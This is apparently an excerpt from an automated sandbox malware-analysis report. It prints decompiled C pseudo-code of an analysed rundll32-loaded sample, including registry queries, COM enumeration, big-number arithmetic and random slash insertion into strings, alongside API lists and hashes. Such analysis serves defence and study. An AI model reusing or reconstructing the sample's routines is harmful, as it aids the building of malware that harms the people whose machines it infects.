RegQueryValueExW.ADVAPI32(05019D8C,?,00000000,80000002,00000000,00000000,?,00791E36,3D007990,80000002,007930C2,00000000,007930C2,?,05019D8C,80000002), ref: 00796A91
RegQueryValueExW.ADVAPI32(05019D8C,?,00000000,80000002,00000000,00000000,00000000,?,00791E36,3D007990,80000002,007930C2,00000000,007930C2,?,05019D8C), ref: 00796AB6
RegCloseKey.ADVAPI32(05019D8C,?,00791E36,3D007990,80000002,007930C2,00000000,007930C2,?,05019D8C,80000002,00000000,?), ref: 00796AE6

Part of subcall function 00794323: SafeArrayDestroy.OLEAUT32(00000000), ref: 007943A8

Part of subcall function 007950CA: RtlFreeHeap.NTDLL(00000000,00000000,00794239,00000000,00000001,?,00000000,?,?,?,00796B8D,00000000,?,00000001), ref: 007950D6

Strings

gyy, xrefs: 00796A6F

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapSafe
String ID: gyy
API String ID: 1375095360-1711083408
Opcode ID: e993c2696f8afccce22806fc78f314105832c8d9a4be46986311e27a7f96f7aa
Instruction ID: 7db3403ce18a34d03f115c12cae72b0fb2fa682d0c4ebd14b8b83169b26869a9
Opcode Fuzzy Hash: e993c2696f8afccce22806fc78f314105832c8d9a4be46986311e27a7f96f7aa
Instruction Fuzzy Hash: C021F87640011DBFCF129F94EC84CEE7B69EB08350B05C226FE15A7120D636DD65DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00796C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00796C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x79a2d4; // 0x487d5a8
					_t5 = _t102 + 0x79b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x7992b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x79a2d4; // 0x487d5a8
												_t28 = _t108 + 0x79b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x79a2d4; // 0x487d5a8
														_t33 = _t78 + 0x79b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00796c72
0x00796c7b
0x00796c7c
0x00796c80
0x00796c86
0x00796c8c
0x00796c95
0x00796c9b
0x00796ca5
0x00796ca7
0x00796cad
0x00796cb2
0x00796cbd
0x00796cc5
0x00796cc8
0x00796deb
0x00796cce
0x00796cce
0x00796cdb
0x00796ce1
0x00796ce7
0x00796ceb
0x00796cf1
0x00796cfe
0x00796d02
0x00796d08
0x00796d0b
0x00796d11
0x00796d17
0x00796d1d
0x00796d20
0x00796d23
0x00796d29
0x00796d32
0x00796d38
0x00796d39
0x00796d3c
0x00796d3d
0x00796d3e
0x00796d46
0x00796d47
0x00796d48
0x00796d4a
0x00796d4e
0x00796d52
0x00000000
0x00000000
0x00796d58
0x00796d61
0x00796d67
0x00796d71
0x00796d75
0x00796d77
0x00796d84
0x00796d88
0x00796d90
0x00796d95
0x00796da7
0x00796da9
0x00796daf
0x00796daf
0x00796db8
0x00796db8
0x00796dba
0x00796dc0
0x00796dc0
0x00796dc3
0x00796dc9
0x00796dcc
0x00796dd5
0x00000000
0x00000000
0x00000000
0x00796dd5
0x00796d29
0x00796d23
0x00796d0b
0x00796ddb
0x00796ddb
0x00796de1
0x00796de1
0x00796de7
0x00796de7
0x00796df0
0x00796df6
0x00796df6
0x00796cb2
0x00796dff

APIs

SysAllocString.OLEAUT32(007992B0), ref: 00796CBD
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00796D9F
SysFreeString.OLEAUT32(00000000), ref: 00796DB8
SysFreeString.OLEAUT32(?), ref: 00796DE7

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 73ed35d4525beb69c7820656bf74fa0ddf0fae7ddd06ae10397adf9311901343
Instruction ID: 63a67faee937170c0301d350fcd5bb4d66d0b3f4e2c247866d415d5ccb1e7631
Opcode Fuzzy Hash: 73ed35d4525beb69c7820656bf74fa0ddf0fae7ddd06ae10397adf9311901343
Instruction Fuzzy Hash: 3E515075E0051AEFCF00DFA8D8888AEB7B5FF88704B148699E915EB314D7359D02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00795D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00795D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E007928F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00791000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00793915(_t101,  &_v428, _a8, _t96 - _t81);
					E00793915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00791000(_t101, 0x79a188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00791000(_a16, _a4);
						E00793B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00797D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00797D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0079679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00795AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00794A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x79a188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00795d96
0x00795da2
0x00795da8
0x00795dad
0x00795db1
0x00795f23
0x00795f27
0x00795f27
0x00795db7
0x00795dbb
0x00795dc1
0x00795dc2
0x00795dcd
0x00795dd3
0x00795dd8
0x00795ddb
0x00795df5
0x00795e04
0x00795e10
0x00795e1a
0x00795e1f
0x00795e21
0x00795e24
0x00795edb
0x00795ee1
0x00795ef2
0x00795f05
0x00795f1b
0x00000000
0x00795f20
0x00795e2d
0x00795e34
0x00795e38
0x00795e3e
0x00795e40
0x00795e42
0x00795e44
0x00795e46
0x00795e50
0x00795e55
0x00795e57
0x00795e59
0x00795e5a
0x00795e5b
0x00795e5c
0x00795e63
0x00795e6a
0x00795e6d
0x00795e6d
0x00795e3a
0x00795e3a
0x00795e3a
0x00795e75
0x00795e7d
0x00795e89
0x00795e8e
0x00795e8e
0x00795e93
0x00000000
0x00000000
0x00795e95
0x00795e98
0x00795ea5
0x00000000
0x00000000
0x00795ea7
0x00795ea7
0x00795eb4
0x00795e8e
0x00795e93
0x00000000
0x00000000
0x00000000
0x00795e93
0x00795ebe
0x00795ec1
0x00795ec4
0x00795ecb
0x00795ecb
0x00795ed8
0x00000000
0x00795ed8
0x00795dc4
0x00795dc8
0x00795dc9
0x00795dcb
0x00000000
0x00000000
0x00000000
0x00795dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00795E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00795E5C
memset.NTDLL ref: 00795F05
memset.NTDLL ref: 00795F1B

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 549c766910757d76ce31e5fe69d163fcbaff781cf771f2d7d68c734c9701b430
Instruction ID: a11fe26ba18ea2b6e47214f11728a65ca9d5b4da7664298a10681ffc8af7d855
Opcode Fuzzy Hash: 549c766910757d76ce31e5fe69d163fcbaff781cf771f2d7d68c734c9701b430
Instruction Fuzzy Hash: 6041C131B00229EFDF11DF68EC85BEE7775EF45320F104165B819AB281DB74AE548B80

Uniqueness

Uniqueness Score: -1.00%

Function 00793032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00793032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00796710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E007915B9(_t23);
						}
					}
					return _t38;
				}
				if(E00794C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x79a2f8, 1, 0,  *0x79a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00794039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00791D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00793C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E007973C3( &_v32, _t39);
					goto L13;
				}
			}

0x00793032
0x0079303f
0x00793045
0x00793046
0x00793047
0x00793048
0x00793049
0x0079304d
0x00793059
0x0079305d
0x007930e5
0x007930e5
0x007930e8
0x007930ea
0x007930f2
0x007930f8
0x007930fb
0x007930fb
0x007930f8
0x00793106
0x00793106
0x00793070
0x00793072
0x00793072
0x00793089
0x0079308d
0x00793090
0x0079309b
0x007930a2
0x007930a2
0x007930ae
0x007930af
0x007930bd
0x007930b1
0x007930b1
0x007930b2
0x007930b3
0x007930b4
0x007930b5
0x007930b6
0x007930b6
0x007930c2
0x007930c7
0x007930c9
0x007930cb
0x007930cb
0x007930d2
0x00000000
0x007930d4
0x007930d4
0x007930e1
0x00000000
0x007930e1

APIs

CreateEventA.KERNEL32(0079A2F8,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,0079211B,?,00000001), ref: 00793083
SetEvent.KERNEL32(00000000,?,?,?,?,0079211B,?,00000001,0079560C,00000002,?,?,0079560C), ref: 00793090
Sleep.KERNEL32(00000BB8,?,?,?,?,0079211B,?,00000001,0079560C,00000002,?,?,0079560C), ref: 0079309B
CloseHandle.KERNEL32(00000000,?,?,?,?,0079211B,?,00000001,0079560C,00000002,?,?,0079560C), ref: 007930A2

Part of subcall function 00794039: WaitForSingleObject.KERNEL32(00000000,?,?,?,007930C2,?,007930C2,?,?,?,?,?,007930C2,?), ref: 00794113
Part of subcall function 00794039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,007930C2,?,?,?,?,?,0079211B,?), ref: 0079413B

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 5bfa210781b6653d3b7b6db134b569c04adf6c591a1bde36fccde1ebe9fa3298
Instruction ID: fda99884457b3942d58bd560b41128f86a40b4a16583fd492774d6cec81a8919
Opcode Fuzzy Hash: 5bfa210781b6653d3b7b6db134b569c04adf6c591a1bde36fccde1ebe9fa3298
Instruction Fuzzy Hash: 3321C572D00219EBDF20AFECA8859EE777EAB44350B05842AFA11A7100DB3DDE45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00794D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00794D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00796837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00794d15
0x00794d19
0x00794d1a
0x00794d1b
0x00794d1d
0x00794d1f
0x00794d24
0x00794d27
0x00794dbe
0x00794dc5
0x00794dc5
0x00794d30
0x00794d37
0x00794d47
0x00794d47
0x00794d4d
0x00794d4f
0x00794d54
0x00794d5d
0x00794d65
0x00794d68
0x00794d73
0x00794d77
0x00794d79
0x00794d7a
0x00794d83
0x00794d87
0x00794d98
0x00794d89
0x00794d8e
0x00794d93
0x00794da2
0x00794da2
0x00794d77
0x00794da8
0x00794dae
0x00794dae
0x00794db7
0x00794dbc
0x00794dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00794D37
lstrlenW.KERNEL32(?), ref: 00794D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00794D8E
SysFreeString.OLEAUT32(?), ref: 00794DA2

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 6c8aa35a0b854fa8e44840f50bd906bdad3885a8e2575e9b7d3e99ffae5a82f7
Instruction ID: 6f5f129fd58c441c48a0cad0094f2c97057818afc555e5f0b6361ebd7b785b9c
Opcode Fuzzy Hash: 6c8aa35a0b854fa8e44840f50bd906bdad3885a8e2575e9b7d3e99ffae5a82f7
Instruction Fuzzy Hash: 9E213E79A01219FFDF10DFA8D888D9EBBB8FF48301B108169EA05D7210E735DA42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 007952E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007952E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x79a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x79a2a8; // 0xf4630c04
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x79a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x007952ed
0x007952f0
0x007952f6
0x0079530e
0x00795312
0x00795315
0x00795317
0x0079531a
0x0079531c
0x0079531f
0x00795321
0x00795321
0x00795323
0x0079532e
0x00795333
0x00795344
0x0079534c
0x00795351
0x00795354
0x00795357
0x00795359
0x0079535f
0x00795362
0x00795362
0x00795362
0x0079536d
0x00795372
0x0079537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007962E0,00000000,?,00000000,007970D9,00000000,05019630), ref: 007952F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 00795308
memcpy.NTDLL(00000000,05019630,-00000008,?,?,?,007962E0,00000000,?,00000000,007970D9,00000000,05019630), ref: 0079534C
memcpy.NTDLL(00000001,05019630,00000001,007970D9,00000000,05019630), ref: 0079536D

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 6d1e950e1c6d486373ff2fac653b56d518cec778f4be91b19319e046be2e9d79
Instruction ID: 30da9bcd798e48e25da41524b9983bcc02370b76a11272767e8250cf551fbc2a
Opcode Fuzzy Hash: 6d1e950e1c6d486373ff2fac653b56d518cec778f4be91b19319e046be2e9d79
Instruction Fuzzy Hash: 76110A72A00114BFDB11CB69EC84D5E7BBDEBC13A0B054266F50497150E6789D018790

Uniqueness

Uniqueness Score: -1.00%

Function 0079578C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0079578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00796837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x7992a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x7992a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00795797
0x0079579b
0x0079579d
0x0079579e
0x007957a6
0x007957a6
0x007957aa
0x00000000
0x00000000
0x007957a1
0x007957a2
0x007957a5
0x007957a5
0x007957b2
0x007957b9
0x007957bd
0x007957c5
0x007957cb
0x007957cd
0x007957d2
0x007957d6
0x007957d8
0x007957db
0x007957e2
0x007957e2
0x007957ec
0x007957ef
0x007957f2
0x007957f2
0x007957fe
0x007957fe
0x0079580b

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0501962C,?,?,?,00791128,0501962C,?,?,007955D3), ref: 007957A6
StrTrimA.SHLWAPI(?,007992A4,00000002,?,?,?,00791128,0501962C,?,?,007955D3), ref: 007957C5
StrChrA.SHLWAPI(?,00000020,?,?,?,00791128,0501962C,?,?,007955D3,?,?,?,?,?,00796BD8), ref: 007957D0
StrTrimA.SHLWAPI(00000001,007992A4,?,?,?,00791128,0501962C,?,?,007955D3,?,?,?,?,?,00796BD8), ref: 007957E2

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 64dac6573751b2f7a2f3835ac35e0145717506f2c56c0b9a81a4bfd79038a3c3
Instruction ID: ebd1f146b2df5a056e05614aec2a849ef20d3d66780095adc5c6b324c24d9fff
Opcode Fuzzy Hash: 64dac6573751b2f7a2f3835ac35e0145717506f2c56c0b9a81a4bfd79038a3c3
Instruction Fuzzy Hash: 1401F571645735AFD7218F69EC09E2BBBE8FF8AB60F21051DF841C7240DB68C80187A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48151D, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6D481541

Part of subcall function 6D481C28: __fltout2.LIBCMT ref: 6D481C51

__cftog_l.LIBCMT ref: 6D481567
__cftoe_l.LIBCMT ref: 6D481599

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 0139714ff64fd903c031cd160c5a7dfe7d421c407e4d45243c8bd2b3cb5defed
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 37014C7254414EBBCF029F84DC41CEE3F66BF19294F558816FA2D98132C336CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00795076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00795076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x79a2c4; // 0x2f0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x79a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x79a2c4; // 0x2f0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x79a290; // 0x4c20000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
